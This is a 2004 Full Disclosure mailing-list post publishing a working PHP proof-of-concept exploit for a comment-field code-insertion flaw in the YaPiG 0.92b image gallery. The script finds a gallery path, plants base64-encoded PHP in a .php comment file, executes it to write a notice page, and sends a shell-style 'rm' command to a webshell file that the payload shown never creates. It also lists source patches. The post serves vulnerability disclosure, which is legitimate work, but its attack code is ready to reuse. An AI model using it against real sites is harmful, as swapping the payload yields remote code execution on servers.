Full Disclosure mailing list archives
YaPiG 0.92b add_coment PHP Insertion Proof of Concept
From: "acidbits ." <acidbits () hotmail com>
Date: Tue, 17 Aug 2004 16:18:18 +0000
#!/usr/bin/php <? /* YaPiG 0.92b add_coment PHP Insertion Proof of Concept By aCiDBiTS acidbits () hotmail com 07-August-2004 Description: YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script. This Proof of Concept creates a php file that echoes a notice. First it determines a valid photo directory where to create the script. Then creates a crafted comment saved in a new .php file. This comment contains an encoded webshell. Once this .php file is opened, the code contained creates test.php. Usage (in my debian box): php4 -q yapig_addc_poc.php "http://127.0.0.1/yapig-0.92b" Vulnerability: There is no user input sanization of some parameters in add_comment.phpand functions.php.This allows to create a file with any extension, and we can insert any code in it. Version 0.92b is vulnerable, I haven't tested older ones.
Workaround. Modify this lines of code: add_comment.php line 105: $comments_file= $gid_dir . $gid . "_" . $phid; Modify with: $comments_file= $gid_dir . $gid . "_" . intval($phid); functions.php, construct_comment_line() line 699-700: $linea=$linea . $data_array['mail'] . $SEPARATOR; $linea=$linea . $data_array['web'] . $SEPARATOR; Modify with: $linea=$linea . htmlspecialchars($data_array['mail']) . $SEPARATOR; $linea=$linea . htmlspecialchars($data_array['web']) . $SEPARATOR; */echo "+-------------------------------------------------------+\n| YaPiG 0.92b add_coment PHP Insertion Proof of Concept |\n| By aCiDBiTS acidbits () hotmail com 07-August-2004 |\n+-------------------------------------------------------+\n\n";
$websh="<?php \$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f); ?>";
if($argc<2) die("Usage: ".$argv[0]." URL_to_YaPiG_script\n\n"); $host=$argv[1]; if(substr($host,strlen($host)-1,1)!='/') $host.='/'; echo "[+] Getting valid gid & photo path ... "; $webc=get_web($host); $temp=explode(";gid=",$webc); $gid=intval($temp[1]); $temp=explode("photos/",$webc); $temp=explode("/",$temp[1]); $path=$temp[0]; if( !$gid || !$path ) die( "Failed!\n\n"); echo "OK\n GID: $gid\n Path: ".$host."photos/".$path."/\n\n"; echo "[+] Creating notice script file ... ";send_post( $host."add_comment.php?gid=".$gid."&phid=.php", "tit=a&aut=a&mail=".urlencode($websh)."&web=&msg=a&date=&send=Send");
$webc=get_web( $host."photos/".$path."/".$gid."_.php" );send_post( $host."photos/".$path."/acidwebshell.php", "c=".urlencode("rm ".$gid."_.php") );
echo "OK\n Now go to: ".$host."photos/".$path."/test.php";die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\ //||\\\\\n\n");
function get_web($url) { $ch=curl_init(); curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_HEADER, 0); curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1); $data=curl_exec ($ch); curl_close ($ch); return $data; } function send_post($url,$data) { $ch=curl_init(); curl_setopt ($ch, CURLOPT_URL, $url ); curl_setopt ($ch, CURLOPT_HEADER, 0); curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt ($ch, CURLOPT_POST, 1); curl_setopt ($ch, CURLOPT_POSTFIELDS, $data ); $data=curl_exec ($ch); curl_close ($ch); return $data; } /* \ / (Oo) //||\\ */ ?> _________________________________________________________________Add photos to your messages with MSN 8. Get 2 months FREE*. http://join.msn.com/?page=features/featuredemail
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- YaPiG 0.92b add_coment PHP Insertion Proof of Concept acidbits . (Aug 17)